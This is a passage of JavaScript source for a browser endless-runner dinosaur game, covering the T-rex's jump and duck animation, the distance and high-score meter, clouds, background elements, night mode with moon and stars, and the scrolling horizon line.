        this.canvasCtx.globalAlpha = 0.5;
      } else if (this.timer > this.config.FLASH_OFF) {
        this.timer = 0;
      }
    }

    // Ducking.
    if (!this.altGameModeEnabled && this.ducking &&
        this.status !== Trex.status.CRASHED) {
      this.canvasCtx.drawImage(Runner.imageSprite, sourceX, sourceY,
          sourceWidth, sourceHeight,
          this.xPos, this.yPos,
          this.config.WIDTH_DUCK, outputHeight);
    } else if (
        this.altGameModeEnabled && this.jumping &&
        this.status !== Trex.status.CRASHED) {
      // Jumping with adjustments.
      this.canvasCtx.drawImage(
          Runner.imageSprite, sourceX, sourceY, sourceWidth, sourceHeight,
          this.xPos - jumpOffset, this.yPos, this.config.WIDTH_JUMP,
          outputHeight);
    } else {
      // Crashed whilst ducking. Trex is standing up so needs adjustment.
      if (this.ducking && this.status === Trex.status.CRASHED) {
        this.xPos++;
      }
      // Standing / running
      this.canvasCtx.drawImage(Runner.imageSprite, sourceX, sourceY,
          sourceWidth, sourceHeight,
          this.xPos, this.yPos,
          this.config.WIDTH, outputHeight);
    }
    this.canvasCtx.globalAlpha = 1;
  },

  /**
   * Sets a random time for the blink to happen.
   */
  setBlinkDelay() {
    this.blinkDelay = Math.ceil(Math.random() * Trex.BLINK_TIMING);
  },

  /**
   * Make t-rex blink at random intervals.
   * @param {number} time Current time in milliseconds.
   */
  blink(time) {
    const deltaTime = time - this.animStartTime;

    if (deltaTime >= this.blinkDelay) {
      this.draw(this.currentAnimFrames[this.currentFrame], 0);

      if (this.currentFrame === 1) {
        // Set new random delay to blink.
        this.setBlinkDelay();
        this.animStartTime = time;
        this.blinkCount++;
      }
    }
  },

  /**
   * Initialise a jump.
   * @param {number} speed
   */
  startJump(speed) {
    if (!this.jumping) {
      this.update(0, Trex.status.JUMPING);
      // Tweak the jump velocity based on the speed.
      this.jumpVelocity = this.config.INITIAL_JUMP_VELOCITY - (speed / 10);
      this.jumping = true;
      this.reachedMinHeight = false;
      this.speedDrop = false;

      if (this.config.INVERT_JUMP) {
        this.minJumpHeight = this.groundYPos + this.config.MIN_JUMP_HEIGHT;
      }
    }
  },

  /**
   * Jump is complete, falling down.
   */
  endJump() {
    if (this.reachedMinHeight &&
        this.jumpVelocity < this.config.DROP_VELOCITY) {
      this.jumpVelocity = this.config.DROP_VELOCITY;
    }
  },

  /**
   * Update frame for a jump.
   * @param {number} deltaTime
   */
  updateJump(deltaTime) {
    const msPerFrame = Trex.animFrames[this.status].msPerFrame;
    const framesElapsed = deltaTime / msPerFrame;

    // Speed drop makes Trex fall faster.
    if (this.speedDrop) {
      this.yPos += Math.round(this.jumpVelocity *
          this.config.SPEED_DROP_COEFFICIENT * framesElapsed);
    } else if (this.config.INVERT_JUMP) {
      this.yPos -= Math.round(this.jumpVelocity * framesElapsed);
    } else {
      this.yPos += Math.round(this.jumpVelocity * framesElapsed);
    }

    this.jumpVelocity += this.config.GRAVITY * framesElapsed;

    // Minimum height has been reached.
    if (this.config.INVERT_JUMP && (this.yPos > this.minJumpHeight) ||
        !this.config.INVERT_JUMP && (this.yPos < this.minJumpHeight) ||
        this.speedDrop) {
      this.reachedMinHeight = true;
    }

    // Reached max height.
    if (this.config.INVERT_JUMP && (this.yPos > -this.config.MAX_JUMP_HEIGHT) ||
        !this.config.INVERT_JUMP && (this.yPos < this.config.MAX_JUMP_HEIGHT) ||
        this.speedDrop) {
      this.endJump();
    }

    // Back down at ground level. Jump completed.
    if ((this.config.INVERT_JUMP && this.yPos) < this.groundYPos ||
        (!this.config.INVERT_JUMP && this.yPos) > this.groundYPos) {
      this.reset();
      this.jumpCount++;

      if (Runner.audioCues) {
        Runner.generatedSoundFx.loopFootSteps();
      }
    }
  },

  /**
   * Set the speed drop. Immediately cancels the current jump.
   */
  setSpeedDrop() {
    this.speedDrop = true;
    this.jumpVelocity = 1;
  },

  /**
   * @param {boolean} isDucking
   */
  setDuck(isDucking) {
    if (isDucking && this.status !== Trex.status.DUCKING) {
      this.update(0, Trex.status.DUCKING);
      this.ducking = true;
    } else if (this.status === Trex.status.DUCKING) {
      this.update(0, Trex.status.RUNNING);
      this.ducking = false;
    }
  },

  /**
   * Reset the t-rex to running at start of game.
   */
  reset() {
    this.xPos = this.xInitialPos;
    this.yPos = this.groundYPos;
    this.jumpVelocity = 0;
    this.jumping = false;
    this.ducking = false;
    this.update(0, Trex.status.RUNNING);
    this.midair = false;
    this.speedDrop = false;
    this.jumpCount = 0;
  },
};


//******************************************************************************

/**
 * Handles displaying the distance meter.
 * @param {!HTMLCanvasElement} canvas
 * @param {Object} spritePos Image position in sprite.
 * @param {number} canvasWidth
 * @constructor
 */
function DistanceMeter(canvas, spritePos, canvasWidth) {
  this.canvas = canvas;
  this.canvasCtx =
      /** @type {CanvasRenderingContext2D} */ (canvas.getContext('2d'));
  this.image = Runner.imageSprite;
  this.spritePos = spritePos;
  this.x = 0;
  this.y = 5;

  this.currentDistance = 0;
  this.maxScore = 0;
  this.highScore = '0';
  this.container = null;

  this.digits = [];
  this.achievement = false;
  this.defaultString = '';
  this.flashTimer = 0;
  this.flashIterations = 0;
  this.invertTrigger = false;
  this.flashingRafId = null;
  this.highScoreBounds = {};
  this.highScoreFlashing = false;

  this.config = DistanceMeter.config;
  this.maxScoreUnits = this.config.MAX_DISTANCE_UNITS;
  this.canvasWidth = canvasWidth;
  this.init(canvasWidth);
}


/**
 * @enum {number}
 */
DistanceMeter.dimensions = {
  WIDTH: 10,
  HEIGHT: 13,
  DEST_WIDTH: 11,
};


/**
 * Y positioning of the digits in the sprite sheet.
 * X position is always 0.
 * @type {Array<number>}
 */
DistanceMeter.yPos = [0, 13, 27, 40, 53, 67, 80, 93, 107, 120];


/**
 * Distance meter config.
 * @enum {number}
 */
DistanceMeter.config = {
  // Number of digits.
  MAX_DISTANCE_UNITS: 5,

  // Distance that causes achievement animation.
  ACHIEVEMENT_DISTANCE: 100,

  // Used for conversion from pixel distance to a scaled unit.
  COEFFICIENT: 0.025,

  // Flash duration in milliseconds.
  FLASH_DURATION: 1000 / 4,

  // Flash iterations for achievement animation.
  FLASH_ITERATIONS: 3,

  // Padding around the high score hit area.
  HIGH_SCORE_HIT_AREA_PADDING: 4,
};


DistanceMeter.prototype = {
  /**
   * Initialise the distance meter to '00000'.
   * @param {number} width Canvas width in px.
   */
  init(width) {
    let maxDistanceStr = '';

    this.calcXPos(width);
    this.maxScore = this.maxScoreUnits;
    for (let i = 0; i < this.maxScoreUnits; i++) {
      this.draw(i, 0);
      this.defaultString += '0';
      maxDistanceStr += '9';
    }

    this.maxScore = parseInt(maxDistanceStr, 10);
  },

  /**
   * Calculate the xPos in the canvas.
   * @param {number} canvasWidth
   */
  calcXPos(canvasWidth) {
    this.x = canvasWidth - (DistanceMeter.dimensions.DEST_WIDTH *
        (this.maxScoreUnits + 1));
  },

  /**
   * Draw a digit to canvas.
   * @param {number} digitPos Position of the digit.
   * @param {number} value Digit value 0-9.
   * @param {boolean=} opt_highScore Whether drawing the high score.
   */
  draw(digitPos, value, opt_highScore) {
    let sourceWidth = DistanceMeter.dimensions.WIDTH;
    let sourceHeight = DistanceMeter.dimensions.HEIGHT;
    let sourceX = DistanceMeter.dimensions.WIDTH * value;
    let sourceY = 0;

    const targetX = digitPos * DistanceMeter.dimensions.DEST_WIDTH;
    const targetY = this.y;
    const targetWidth = DistanceMeter.dimensions.WIDTH;
    const targetHeight = DistanceMeter.dimensions.HEIGHT;

    // For high DPI we 2x source values.
    if (IS_HIDPI) {
      sourceWidth *= 2;
      sourceHeight *= 2;
      sourceX *= 2;
    }

    sourceX += this.spritePos.x;
    sourceY += this.spritePos.y;

    this.canvasCtx.save();

    if (IS_RTL) {
      if (opt_highScore) {
        this.canvasCtx.translate(
            this.canvasWidth -
                (DistanceMeter.dimensions.WIDTH * (this.maxScoreUnits + 3)),
            this.y);
      } else {
        this.canvasCtx.translate(
            this.canvasWidth - DistanceMeter.dimensions.WIDTH, this.y);
      }
      this.canvasCtx.scale(-1, 1);
    } else {
      const highScoreX =
          this.x - (this.maxScoreUnits * 2) * DistanceMeter.dimensions.WIDTH;
      if (opt_highScore) {
        this.canvasCtx.translate(highScoreX, this.y);
      } else {
        this.canvasCtx.translate(this.x, this.y);
      }
    }

    this.canvasCtx.drawImage(
        this.image,
        sourceX,
        sourceY,
        sourceWidth,
        sourceHeight,
        targetX,
        targetY,
        targetWidth,
        targetHeight,
    );

    this.canvasCtx.restore();
  },

  /**
   * Convert pixel distance to a 'real' distance.
   * @param {number} distance Pixel distance ran.
   * @return {number} The 'real' distance ran.
   */
  getActualDistance(distance) {
    return distance ? Math.round(distance * this.config.COEFFICIENT) : 0;
  },

  /**
   * Update the distance meter.
   * @param {number} deltaTime
   * @param {number} distance
   * @return {boolean} Whether the achievement sound fx should be played.
   */
  update(deltaTime, distance) {
    let paint = true;
    let playSound = false;

    if (!this.achievement) {
      distance = this.getActualDistance(distance);
      // Score has gone beyond the initial digit count.
      if (distance > this.maxScore && this.maxScoreUnits ==
        this.config.MAX_DISTANCE_UNITS) {
        this.maxScoreUnits++;
        this.maxScore = parseInt(this.maxScore + '9', 10);
      } else {
        this.distance = 0;
      }

      if (distance > 0) {
        // Achievement unlocked.
        if (distance % this.config.ACHIEVEMENT_DISTANCE === 0) {
          // Flash score and play sound.
          this.achievement = true;
          this.flashTimer = 0;
          playSound = true;
        }

        // Create a string representation of the distance with leading 0.
        const distanceStr = (this.defaultString +
            distance).substr(-this.maxScoreUnits);
        this.digits = distanceStr.split('');
      } else {
        this.digits = this.defaultString.split('');
      }
    } else {
      // Control flashing of the score on reaching achievement.
      if (this.flashIterations <= this.config.FLASH_ITERATIONS) {
        this.flashTimer += deltaTime;

        if (this.flashTimer < this.config.FLASH_DURATION) {
          paint = false;
        } else if (this.flashTimer > this.config.FLASH_DURATION * 2) {
          this.flashTimer = 0;
          this.flashIterations++;
        }
      } else {
        this.achievement = false;
        this.flashIterations = 0;
        this.flashTimer = 0;
      }
    }

    // Draw the digits if not flashing.
    if (paint) {
      for (let i = this.digits.length - 1; i >= 0; i--) {
        this.draw(i, parseInt(this.digits[i], 10));
      }
    }

    this.drawHighScore();
    return playSound;
  },

  /**
   * Draw the high score.
   */
  drawHighScore() {
    if (parseInt(this.highScore, 10) > 0) {
      this.canvasCtx.save();
      this.canvasCtx.globalAlpha = .8;
      for (let i = this.highScore.length - 1; i >= 0; i--) {
        this.draw(i, parseInt(this.highScore[i], 10), true);
      }
      this.canvasCtx.restore();
    }
  },

  /**
   * Set the high score as an array string.
   * Position of char in the sprite: H - 10, I - 11.
   * @param {number} distance Distance ran in pixels.
   */
  setHighScore(distance) {
    distance = this.getActualDistance(distance);
    const highScoreStr = (this.defaultString +
        distance).substr(-this.maxScoreUnits);

    this.highScore = ['10', '11', ''].concat(highScoreStr.split(''));
  },


  /**
   * Whether a click is in the high score area.
   * @param {Event} e Event object.
   * @return {boolean} Whether the click was in the high score bounds.
   */
  hasClickedOnHighScore(e) {
    let x = 0;
    let y = 0;

    if (e.touches) {
      // Bounds for touch differ from pointer.
      const canvasBounds = this.canvas.getBoundingClientRect();
      x = e.touches[0].clientX - canvasBounds.left;
      y = e.touches[0].clientY - canvasBounds.top;
    } else {
      x = e.offsetX;
      y = e.offsetY;
    }

    this.highScoreBounds = this.getHighScoreBounds();
    return x >= this.highScoreBounds.x && x <=
        this.highScoreBounds.x + this.highScoreBounds.width &&
        y >= this.highScoreBounds.y && y <=
        this.highScoreBounds.y + this.highScoreBounds.height;
  },

  /**
   * Get the bounding box for the high score.
   * @return {Object} Object with x, y, width and height properties.
   */
  getHighScoreBounds() {
    return {
      x: (this.x - (this.maxScoreUnits * 2) * DistanceMeter.dimensions.WIDTH) -
          DistanceMeter.config.HIGH_SCORE_HIT_AREA_PADDING,
      y: this.y,
      width: DistanceMeter.dimensions.WIDTH * (this.highScore.length + 1) +
          DistanceMeter.config.HIGH_SCORE_HIT_AREA_PADDING,
      height: DistanceMeter.dimensions.HEIGHT +
          (DistanceMeter.config.HIGH_SCORE_HIT_AREA_PADDING * 2),
    };
  },

  /**
   * Animate flashing the high score to indicate ready for resetting.
   * The flashing stops following this.config.FLASH_ITERATIONS x 2 flashes.
   */
  flashHighScore() {
    const now = getTimeStamp();
    const deltaTime = now - (this.frameTimeStamp || now);
    let paint = true;
    this.frameTimeStamp = now;

    // Reached the max number of flashes.
    if (this.flashIterations > this.config.FLASH_ITERATIONS * 2) {
      this.cancelHighScoreFlashing();
      return;
    }

    this.flashTimer += deltaTime;

    if (this.flashTimer < this.config.FLASH_DURATION) {
      paint = false;
    } else if (this.flashTimer > this.config.FLASH_DURATION * 2) {
      this.flashTimer = 0;
      this.flashIterations++;
    }

    if (paint) {
      this.drawHighScore();
    } else {
      this.clearHighScoreBounds();
    }
    // Frame update.
    this.flashingRafId =
        requestAnimationFrame(this.flashHighScore.bind(this));
  },

  /**
   * Draw empty rectangle over high score.
   */
  clearHighScoreBounds() {
    this.canvasCtx.save();
    this.canvasCtx.fillStyle = '#fff';
    this.canvasCtx.rect(this.highScoreBounds.x, this.highScoreBounds.y,
        this.highScoreBounds.width, this.highScoreBounds.height);
    this.canvasCtx.fill();
    this.canvasCtx.restore();
  },

  /**
   * Starts the flashing of the high score.
   */
  startHighScoreFlashing() {
    this.highScoreFlashing = true;
    this.flashHighScore();
  },

  /**
   * Whether high score is flashing.
   * @return {boolean}
   */
  isHighScoreFlashing() {
    return this.highScoreFlashing;
  },

  /**
   * Stop flashing the high score.
   */
  cancelHighScoreFlashing() {
    if (this.flashingRafId) {
      cancelAnimationFrame(this.flashingRafId);
    }
    this.flashIterations = 0;
    this.flashTimer = 0;
    this.highScoreFlashing = false;
    this.clearHighScoreBounds();
    this.drawHighScore();
  },

  /**
   * Clear the high score.
   */
  resetHighScore() {
    this.setHighScore(0);
    this.cancelHighScoreFlashing();
  },

  /**
   * Reset the distance meter back to '00000'.
   */
  reset() {
    this.update(0, 0);
    this.achievement = false;
  },
};


//******************************************************************************

/**
 * Cloud background item.
 * Similar to an obstacle object but without collision boxes.
 * @param {HTMLCanvasElement} canvas Canvas element.
 * @param {Object} spritePos Position of image in sprite.
 * @param {number} containerWidth
 * @constructor
 */
function Cloud(canvas, spritePos, containerWidth) {
  this.canvas = canvas;
  this.canvasCtx =
      /** @type {CanvasRenderingContext2D} */ (this.canvas.getContext('2d'));
  this.spritePos = spritePos;
  this.containerWidth = containerWidth;
  this.xPos = containerWidth;
  this.yPos = 0;
  this.remove = false;
  this.gap =
      getRandomNum(Cloud.config.MIN_CLOUD_GAP, Cloud.config.MAX_CLOUD_GAP);

  this.init();
}


/**
 * Cloud object config.
 * @enum {number}
 */
Cloud.config = {
  HEIGHT: 14,
  MAX_CLOUD_GAP: 400,
  MAX_SKY_LEVEL: 30,
  MIN_CLOUD_GAP: 100,
  MIN_SKY_LEVEL: 71,
  WIDTH: 46,
};


Cloud.prototype = {
  /**
   * Initialise the cloud. Sets the Cloud height.
   */
  init() {
    this.yPos = getRandomNum(Cloud.config.MAX_SKY_LEVEL,
        Cloud.config.MIN_SKY_LEVEL);
    this.draw();
  },

  /**
   * Draw the cloud.
   */
  draw() {
    this.canvasCtx.save();
    let sourceWidth = Cloud.config.WIDTH;
    let sourceHeight = Cloud.config.HEIGHT;
    const outputWidth = sourceWidth;
    const outputHeight = sourceHeight;
    if (IS_HIDPI) {
      sourceWidth = sourceWidth * 2;
      sourceHeight = sourceHeight * 2;
    }

    this.canvasCtx.drawImage(Runner.imageSprite, this.spritePos.x,
        this.spritePos.y,
        sourceWidth, sourceHeight,
        this.xPos, this.yPos,
        outputWidth, outputHeight);

    this.canvasCtx.restore();
  },

  /**
   * Update the cloud position.
   * @param {number} speed
   */
  update(speed) {
    if (!this.remove) {
      this.xPos -= Math.ceil(speed);
      this.draw();

      // Mark as removable if no longer in the canvas.
      if (!this.isVisible()) {
        this.remove = true;
      }
    }
  },

  /**
   * Check if the cloud is visible on the stage.
   * @return {boolean}
   */
  isVisible() {
    return this.xPos + Cloud.config.WIDTH > 0;
  },
};


/**
 * Background item.
 * Similar to cloud, without random y position.
 * @param {HTMLCanvasElement} canvas Canvas element.
 * @param {Object} spritePos Position of image in sprite.
 * @param {number} containerWidth
 * @param {string} type Element type.
 * @constructor
 */
function BackgroundEl(canvas, spritePos, containerWidth, type) {
  this.canvas = canvas;
  this.canvasCtx =
      /** @type {CanvasRenderingContext2D} */ (this.canvas.getContext('2d'));
  this.spritePos = spritePos;
  this.containerWidth = containerWidth;
  this.xPos = containerWidth;
  this.yPos = 0;
  this.remove = false;
  this.type = type;
  this.gap =
      getRandomNum(BackgroundEl.config.MIN_GAP, BackgroundEl.config.MAX_GAP);
  this.animTimer = 0;
  this.switchFrames = false;

  this.spriteConfig = {};
  this.init();
}

/**
 * Background element object config.
 * Real values assigned when game type changes.
 * @enum {number}
 */
BackgroundEl.config = {
  MAX_BG_ELS: 0,
  MAX_GAP: 0,
  MIN_GAP: 0,
  POS: 0,
  SPEED: 0,
  Y_POS: 0,
  MS_PER_FRAME: 0,  // only needed when BACKGROUND_EL.FIXED is true
};


BackgroundEl.prototype = {
  /**
   * Initialise the element setting the y position.
   */
  init() {
    this.spriteConfig = Runner.spriteDefinition.BACKGROUND_EL[this.type];
    if (this.spriteConfig.FIXED) {
      this.xPos = this.spriteConfig.FIXED_X_POS;
    }
    this.yPos = BackgroundEl.config.Y_POS - this.spriteConfig.HEIGHT +
        this.spriteConfig.OFFSET;
    this.draw();
  },

  /**
   * Draw the element.
   */
  draw() {
    this.canvasCtx.save();
    let sourceWidth = this.spriteConfig.WIDTH;
    let sourceHeight = this.spriteConfig.HEIGHT;
    let sourceX = this.spriteConfig.X_POS;
    const outputWidth = sourceWidth;
    const outputHeight = sourceHeight;

    if (IS_HIDPI) {
      sourceWidth *= 2;
      sourceHeight *= 2;
      sourceX *= 2;
    }

    this.canvasCtx.drawImage(
        Runner.imageSprite, sourceX, this.spritePos.y, sourceWidth,
        sourceHeight, this.xPos, this.yPos, outputWidth, outputHeight);

    this.canvasCtx.restore();
  },

  /**
   * Update the background element position.
   * @param {number} speed
   */
  update(speed) {
    if (!this.remove) {
      if (this.spriteConfig.FIXED) {
        this.animTimer += speed;
        if (this.animTimer > BackgroundEl.config.MS_PER_FRAME) {
          this.animTimer = 0;
          this.switchFrames = !this.switchFrames;
        }

        if (this.spriteConfig.FIXED_Y_POS_1 &&
            this.spriteConfig.FIXED_Y_POS_2) {
          this.yPos = this.switchFrames ? this.spriteConfig.FIXED_Y_POS_1 :
                                          this.spriteConfig.FIXED_Y_POS_2;
        }
      } else {
        // Fixed speed, regardless of actual game speed.
        this.xPos -= BackgroundEl.config.SPEED;
      }
      this.draw();

      // Mark as removable if no longer in the canvas.
      if (!this.isVisible()) {
        this.remove = true;
      }
    }
  },

  /**
   * Check if the element is visible on the stage.
   * @return {boolean}
   */
  isVisible() {
    return this.xPos + this.spriteConfig.WIDTH > 0;
  },
};



//******************************************************************************

/**
 * Nightmode shows a moon and stars on the horizon.
 * @param {HTMLCanvasElement} canvas
 * @param {number} spritePos
 * @param {number} containerWidth
 * @constructor
 */
function NightMode(canvas, spritePos, containerWidth) {
  this.spritePos = spritePos;
  this.canvas = canvas;
  this.canvasCtx =
      /** @type {CanvasRenderingContext2D} */ (canvas.getContext('2d'));
  this.xPos = containerWidth - 50;
  this.yPos = 30;
  this.currentPhase = 0;
  this.opacity = 0;
  this.containerWidth = containerWidth;
  this.stars = [];
  this.drawStars = false;
  this.placeStars();
}

/**
 * @enum {number}
 */
NightMode.config = {
  FADE_SPEED: 0.035,
  HEIGHT: 40,
  MOON_SPEED: 0.25,
  NUM_STARS: 2,
  STAR_SIZE: 9,
  STAR_SPEED: 0.3,
  STAR_MAX_Y: 70,
  WIDTH: 20,
};

NightMode.phases = [140, 120, 100, 60, 40, 20, 0];

NightMode.prototype = {
  /**
   * Update moving moon, changing phases.
   * @param {boolean} activated Whether night mode is activated.
   */
  update(activated) {
    // Moon phase.
    if (activated && this.opacity === 0) {
      this.currentPhase++;

      if (this.currentPhase >= NightMode.phases.length) {
        this.currentPhase = 0;
      }
    }

    // Fade in / out.
    if (activated && (this.opacity < 1 || this.opacity === 0)) {
      this.opacity += NightMode.config.FADE_SPEED;
    } else if (this.opacity > 0) {
      this.opacity -= NightMode.config.FADE_SPEED;
    }

    // Set moon positioning.
    if (this.opacity > 0) {
      this.xPos = this.updateXPos(this.xPos, NightMode.config.MOON_SPEED);

      // Update stars.
      if (this.drawStars) {
        for (let i = 0; i < NightMode.config.NUM_STARS; i++) {
          this.stars[i].x =
              this.updateXPos(this.stars[i].x, NightMode.config.STAR_SPEED);
        }
      }
      this.draw();
    } else {
      this.opacity = 0;
      this.placeStars();
    }
    this.drawStars = true;
  },

  updateXPos(currentPos, speed) {
    if (currentPos < -NightMode.config.WIDTH) {
      currentPos = this.containerWidth;
    } else {
      currentPos -= speed;
    }
    return currentPos;
  },

  draw() {
    let moonSourceWidth = this.currentPhase === 3 ? NightMode.config.WIDTH * 2 :
                                                    NightMode.config.WIDTH;
    let moonSourceHeight = NightMode.config.HEIGHT;
    let moonSourceX = this.spritePos.x + NightMode.phases[this.currentPhase];
    const moonOutputWidth = moonSourceWidth;
    let starSize = NightMode.config.STAR_SIZE;
    let starSourceX = Runner.spriteDefinitionByType.original.LDPI.STAR.x;

    if (IS_HIDPI) {
      moonSourceWidth *= 2;
      moonSourceHeight *= 2;
      moonSourceX = this.spritePos.x +
          (NightMode.phases[this.currentPhase] * 2);
      starSize *= 2;
      starSourceX = Runner.spriteDefinitionByType.original.HDPI.STAR.x;
    }

    this.canvasCtx.save();
    this.canvasCtx.globalAlpha = this.opacity;

    // Stars.
    if (this.drawStars) {
      for (let i = 0; i < NightMode.config.NUM_STARS; i++) {
        this.canvasCtx.drawImage(
            Runner.origImageSprite, starSourceX, this.stars[i].sourceY,
            starSize, starSize, Math.round(this.stars[i].x), this.stars[i].y,
            NightMode.config.STAR_SIZE, NightMode.config.STAR_SIZE);
      }
    }

    // Moon.
    this.canvasCtx.drawImage(
        Runner.origImageSprite, moonSourceX, this.spritePos.y, moonSourceWidth,
        moonSourceHeight, Math.round(this.xPos), this.yPos, moonOutputWidth,
        NightMode.config.HEIGHT);

    this.canvasCtx.globalAlpha = 1;
    this.canvasCtx.restore();
  },

  // Do star placement.
  placeStars() {
    const segmentSize = Math.round(this.containerWidth /
        NightMode.config.NUM_STARS);

    for (let i = 0; i < NightMode.config.NUM_STARS; i++) {
      this.stars[i] = {};
      this.stars[i].x = getRandomNum(segmentSize * i, segmentSize * (i + 1));
      this.stars[i].y = getRandomNum(0, NightMode.config.STAR_MAX_Y);

      if (IS_HIDPI) {
        this.stars[i].sourceY =
            Runner.spriteDefinitionByType.original.HDPI.STAR.y +
            NightMode.config.STAR_SIZE * 2 * i;
      } else {
        this.stars[i].sourceY =
            Runner.spriteDefinitionByType.original.LDPI.STAR.y +
            NightMode.config.STAR_SIZE * i;
      }
    }
  },

  reset() {
    this.currentPhase = 0;
    this.opacity = 0;
    this.update(false);
  },

};


//******************************************************************************

/**
 * Horizon Line.
 * Consists of two connecting lines. Randomly assigns a flat / bumpy horizon.
 * @param {HTMLCanvasElement} canvas
 * @param {Object} lineConfig Configuration object.
 * @constructor
 */
function HorizonLine(canvas, lineConfig) {
  let sourceX = lineConfig.SOURCE_X;
  let sourceY = lineConfig.SOURCE_Y;

  if (IS_HIDPI) {
    sourceX *= 2;
    sourceY *= 2;
  }

  this.spritePos = {x: sourceX, y: sourceY};
  this.canvas = canvas;
  this.canvasCtx =
      /** @type {CanvasRenderingContext2D} */ (canvas.getContext('2d'));
  this.sourceDimensions = {};
  this.dimensions = lineConfig;

  this.sourceXPos = [this.spritePos.x, this.spritePos.x +
      this.dimensions.WIDTH];
  this.xPos = [];
  this.yPos = 0;
  this.bumpThreshold = 0.5;

  this.setSourceDimensions(lineConfig);
  this.draw();
}


/**
 * Horizon line dimensions.
 * @enum {number}
 */
HorizonLine.dimensions = {
  WIDTH: 600,
  HEIGHT: 12,
  YPOS: 127,
};


HorizonLine.prototype = {
  /**
   * Set the source dimensions of the horizon line.
   */
  setSourceDimensions(newDimensions) {
    for (const dimension in newDimensions) {
      if (dimension !== 'SOURCE_X' && dimension !== 'SOURCE_Y') {
        if (IS_HIDPI) {
          if (dimension !== 'YPOS') {
            this.sourceDimensions[dimension] = newDimensions[dimension] * 2;
          }
        } else {
          this.sourceDimensions[dimension] = newDimensions[dimension];
        }
        this.dimensions[dimension] = newDimensions[dimension];
      }
    }

    this.xPos = [0, newDimensions.WIDTH];
    this.yPos = newDimensions.YPOS;
  },

  /**
   * Return the crop x position of a type.
   */
  getRandomType() {
    return Math.random() > this.bumpThreshold ? this.dimensions.WIDTH : 0;
  },

  /**
   * Draw the horizon line.
   */
  draw() {
    this.canvasCtx.drawImage(Runner.imageSprite, this.sourceXPos[0],
        this.spritePos.y,
        this.sourceDimensions.WIDTH, this.sourceDimensions.HEIGHT,
        this.xPos[0], this.yPos,
        this.dimensions.WIDTH, this.dimensions.HEIGHT);

    this.canvasCtx.drawImage(Runner.imageSprite, this.sourceXPos[1],
        this.spritePos.y,
        this.sourceDimensions.WIDTH, this.sourceDimensions.HEIGHT,
        this.xPos[1], this.yPos,
        this.dimensions.WIDTH, this.dimensions.HEIGHT);
  },

  /**
   * Update the x position of an individual piece of the line.
   * @param {number} pos Line position.
   * @param {number} increment
   */
  updateXPos(pos, increment) {
    const line1 = pos;
    const line2 = pos === 0 ? 1 : 0;

    this.xPos[line1] -= increment;
    this.xPos[line2] = this.xPos[line1] + this.dimensions.WIDTH;

    if (this.xPos[line1] <= -this.dimensions.WIDTH) {
      this.xPos[line1] += this.dimensions.WIDTH * 2;
      this.xPos[line2] = this.xPos[line1] - this.dimensions.WIDTH;
      this.sourceXPos[line1] = this.getRandomType() + this.spritePos.x;
    }
  },

  /**
   * Update the horizon line.
   * @param {number} deltaTime
   * @param {number} speed
   */
  update(deltaTime, speed) {
    const increment = Math.floor(speed * (FPS / 1000) * deltaTime);

    if (this.xPos[0] <= 0) {
      this.updateXPos(0, increment);
    } else {
      this.updateXPos(1, increment);
    }
    this.draw();
  },

  /**
   * Reset horizon to the starting position.
   */
  reset() {
    this.xPos[0] = 0;
    this.xPos[1] = this.dimensions.WIDTH;
  },
};


//******************************************************************************

/**
 * Horizon background class.
 * @param {HTMLCanvasElement} canvas
 * @param {Object} spritePos Sprite positioning.
 * @param {Object} dimensions Canvas dimensions.
 * @param {number} gapCoefficient
 * @constructor
 */
function Horizon(canvas, spritePos, dimensions, gapCoefficient) {
  this.canvas = canvas;
  this.canvasCtx =
      /** @type {CanvasRenderingContext2D} */ (this.canvas.getContext('2d'));
  this.config = Horizon.config;
  this.dimensions = dimensions;
  this.gapCoefficient = gapCoefficient;
  this.obstacles = [];
  this.obstacleHistory = [];
  this.horizonOffsets = [0, 0];
  this.cloudFrequency = this.config.CLOUD_FREQUENCY;
  this.spritePos = spritePos;
  this.nightMode = null;
  this.altGameModeActive = false;

  // Cloud
  this.clouds = [];
  this.cloudSpeed = this.config.BG_CLOUD_SPEED;

  // Background elements
  this.backgroundEls = [];
  this.lastEl = null;
  this.backgroundSpeed = this.config.BG_CLOUD_SPEED;

  // Horizon
  this.horizonLine = null;
  this.horizonLines = [];
  this.init();
}


/**
 * Horizon config.
 * @enum {number}
 */
Horizon.config = {
  BG_CLOUD_SPEED: 0.2,
  BUMPY_THRESHOLD: .3,
  CLOUD_FREQUENCY: .5,
  HORIZON_HEIGHT: 16,
  MAX_CLOUDS: 6,
};


Horizon.prototype = {
  /**
   * Initialise the horizon. Just add the line and a cloud. No obstacles.
   */
  init() {
    Obstacle.types = Runner.spriteDefinitionByType.original.OBSTACLES;
    this.addCloud();
    // Multiple Horizon lines
    for (let i = 0; i < Runner.spriteDefinition.LINES.length; i++) {
      this.horizonLines.push(
          new HorizonLine(this.canvas, Runner.spriteDefinition.LINES[i]));
    }

    this.nightMode = new NightMode(this.canvas, this.spritePos.MOON,
        this.dimensions.WIDTH);
  },

  /**
   * Update obstacle definitions based on the speed of the game.
   */
  adjustObstacleSpeed: function() {
    for (let i = 0; i < Obstacle.types.length; i++) {
      if (Runner.slowDown) {
        Obstacle.types[i].multipleSpeed = Obstacle.types[i].multipleSpeed / 2;
        Obstacle.types[i].minGap *= 1.5;
        Obstacle.types[i].minSpeed = Obstacle.types[i].minSpeed / 2;

        // Convert variable y position obstacles to fixed.
        if (typeof (Obstacle.types[i].yPos) == 'object') {
          Obstacle.types[i].yPos = Obstacle.types[i].yPos[0];
          Obstacle.types[i].yPosMobile = Obstacle.types[i].yPos[0];
        }
      }
    }
  },

  /**
   * Update sprites to correspond to change in sprite sheet.
   * @param {number} spritePos
   */
  enableAltGameMode: function(spritePos) {
    // Clear existing horizon objects.
    this.clouds = [];
    this.backgroundEls = [];

    this.altGameModeActive = true;
    this.spritePos = spritePos;

    Obstacle.types = Runner.spriteDefinition.OBSTACLES;
    this.adjustObstacleSpeed();

    Obstacle.MAX_GAP_COEFFICIENT = Runner.spriteDefinition.MAX_GAP_COEFFICIENT;
    Obstacle.MAX_OBSTACLE_LENGTH = Runner.spriteDefinition.MAX_OBSTACLE_LENGTH;

    BackgroundEl.config = Runner.spriteDefinition.BACKGROUND_EL_CONFIG;

    this.horizonLines = [];
    for (let i = 0; i < Runner.spriteDefinition.LINES.length; i++) {
      this.horizonLines.push(
          new HorizonLine(this.canvas, Runner.spriteDefinition.LINES[i]));
    }
    this.reset();
  },

  /**
   * @param {number} deltaTime
   * @param {number} currentSpeed
   * @param {boolean} updateObstacles Used as an override to prevent
   *     the obstacles from being updated / added. This happens in the
   *     ease in section.
